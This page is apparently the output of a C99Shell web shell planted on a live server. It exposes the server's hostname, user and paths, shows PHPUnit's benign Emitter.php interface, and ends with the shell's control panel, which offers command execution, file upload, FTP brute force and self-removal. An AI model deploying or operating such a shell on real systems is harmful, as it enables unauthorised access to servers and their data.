!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/phpunit/phpunit/src/Event/Emitter/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Emitter.php (10.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);
/*
 * This file is part of PHPUnit.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace PHPUnit\Event;

use 
PHPUnit\Event\Code\ClassMethod;
use 
PHPUnit\Event\Code\ComparisonFailure;
use 
PHPUnit\Event\Code\Throwable;
use 
PHPUnit\Event\TestSuite\TestSuite;
use 
PHPUnit\Framework\Constraint;
use 
PHPUnit\TextUI\Configuration\Configuration;

/**
 * @internal This class is not covered by the backward compatibility promise for PHPUnit
 */
interface Emitter
{
    
/**
     * @deprecated
     */
    
public function exportObjects(): void;

    
/**
     * @deprecated
     */
    
public function exportsObjects(): bool;

    public function 
applicationStarted(): void;

    public function 
testRunnerStarted(): void;

    public function 
testRunnerConfigured(Configuration $configuration): void;

    public function 
testRunnerBootstrapFinished(string $filename): void;

    public function 
testRunnerLoadedExtensionFromPhar(string $filenamestring $namestring $version): void;

    
/**
     * @psalm-param class-string $className
     * @psalm-param array<string, string> $parameters
     */
    
public function testRunnerBootstrappedExtension(string $className, array $parameters): void;

    public function 
dataProviderMethodCalled(ClassMethod $testMethodClassMethod $dataProviderMethod): void;

    public function 
dataProviderMethodFinished(ClassMethod $testMethodClassMethod ...$calledMethods): void;

    public function 
testSuiteLoaded(TestSuite $testSuite): void;

    public function 
testSuiteFiltered(TestSuite $testSuite): void;

    public function 
testSuiteSorted(int $executionOrderint $executionOrderDefectsbool $resolveDependencies): void;

    public function 
testRunnerEventFacadeSealed(): void;

    public function 
testRunnerExecutionStarted(TestSuite $testSuite): void;

    public function 
testRunnerDisabledGarbageCollection(): void;

    public function 
testRunnerTriggeredGarbageCollection(): void;

    public function 
testSuiteSkipped(TestSuite $testSuitestring $message): void;

    public function 
testSuiteStarted(TestSuite $testSuite): void;

    public function 
testPreparationStarted(Code\Test $test): void;

    public function 
testPreparationFailed(Code\Test $test): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testBeforeFirstTestMethodCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testBeforeFirstTestMethodErrored(string $testClassNameClassMethod $calledMethodThrowable $throwable): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testBeforeFirstTestMethodFinished(string $testClassNameClassMethod ...$calledMethods): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testBeforeTestMethodCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testBeforeTestMethodFinished(string $testClassNameClassMethod ...$calledMethods): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testPreConditionCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testPreConditionFinished(string $testClassNameClassMethod ...$calledMethods): void;

    public function 
testPrepared(Code\Test $test): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testRegisteredComparator(string $className): void;

    
/**
     * @deprecated
     */
    
public function testAssertionSucceeded(mixed $valueConstraint\Constraint $constraintstring $message): void;

    
/**
     * @deprecated
     */
    
public function testAssertionFailed(mixed $valueConstraint\Constraint $constraintstring $message): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testCreatedMockObject(string $className): void;

    
/**
     * @psalm-param list<class-string> $interfaces
     */
    
public function testCreatedMockObjectForIntersectionOfInterfaces(array $interfaces): void;

    
/**
     * @psalm-param trait-string $traitName
     */
    
public function testCreatedMockObjectForTrait(string $traitName): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testCreatedMockObjectForAbstractClass(string $className): void;

    
/**
     * @psalm-param class-string $originalClassName
     * @psalm-param class-string $mockClassName
     */
    
public function testCreatedMockObjectFromWsdl(string $wsdlFilestring $originalClassNamestring $mockClassName, array $methodsbool $callOriginalConstructor, array $options): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testCreatedPartialMockObject(string $classNamestring ...$methodNames): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testCreatedTestProxy(string $className, array $constructorArguments): void;

    
/**
     * @psalm-param class-string $className
     */
    
public function testCreatedStub(string $className): void;

    
/**
     * @psalm-param list<class-string> $interfaces
     */
    
public function testCreatedStubForIntersectionOfInterfaces(array $interfaces): void;

    public function 
testErrored(Code\Test $testThrowable $throwable): void;

    public function 
testFailed(Code\Test $testThrowable $throwable, ?ComparisonFailure $comparisonFailure): void;

    public function 
testPassed(Code\Test $test): void;

    
/**
     * @psalm-param non-empty-string $message
     */
    
public function testConsideredRisky(Code\Test $teststring $message): void;

    public function 
testMarkedAsIncomplete(Code\Test $testThrowable $throwable): void;

    
/**
     * @psalm-param non-empty-string $message
     */
    
public function testSkipped(Code\Test $teststring $message): void;

    
/**
     * @psalm-param non-empty-string $message
     */
    
public function testTriggeredPhpunitDeprecation(Code\Test $teststring $message): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredPhpDeprecation(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaselinebool $ignoredByTest): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredDeprecation(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaselinebool $ignoredByTest): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredError(Code\Test $teststring $messagestring $fileint $linebool $suppressed): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredNotice(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaseline): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredPhpNotice(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaseline): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredWarning(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaseline): void;

    
/**
     * @psalm-param non-empty-string $message
     * @psalm-param non-empty-string $file
     * @psalm-param positive-int $line
     */
    
public function testTriggeredPhpWarning(Code\Test $teststring $messagestring $fileint $linebool $suppressedbool $ignoredByBaseline): void;

    
/**
     * @psalm-param non-empty-string $message
     */
    
public function testTriggeredPhpunitError(Code\Test $teststring $message): void;

    
/**
     * @psalm-param non-empty-string $message
     */
    
public function testTriggeredPhpunitWarning(Code\Test $teststring $message): void;

    
/**
     * @psalm-param non-empty-string $output
     */
    
public function testPrintedUnexpectedOutput(string $output): void;

    public function 
testFinished(Code\Test $testint $numberOfAssertionsPerformed): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testPostConditionCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testPostConditionFinished(string $testClassNameClassMethod ...$calledMethods): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testAfterTestMethodCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testAfterTestMethodFinished(string $testClassNameClassMethod ...$calledMethods): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testAfterLastTestMethodCalled(string $testClassNameClassMethod $calledMethod): void;

    
/**
     * @psalm-param class-string $testClassName
     */
    
public function testAfterLastTestMethodFinished(string $testClassNameClassMethod ...$calledMethods): void;

    public function 
testSuiteFinished(TestSuite $testSuite): void;

    public function 
testRunnerTriggeredDeprecation(string $message): void;

    public function 
testRunnerTriggeredWarning(string $message): void;

    public function 
testRunnerEnabledGarbageCollection(): void;

    public function 
testRunnerExecutionAborted(): void;

    public function 
testRunnerExecutionFinished(): void;

    public function 
testRunnerFinished(): void;

    public function 
applicationFinished(int $shellExitCode): void;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--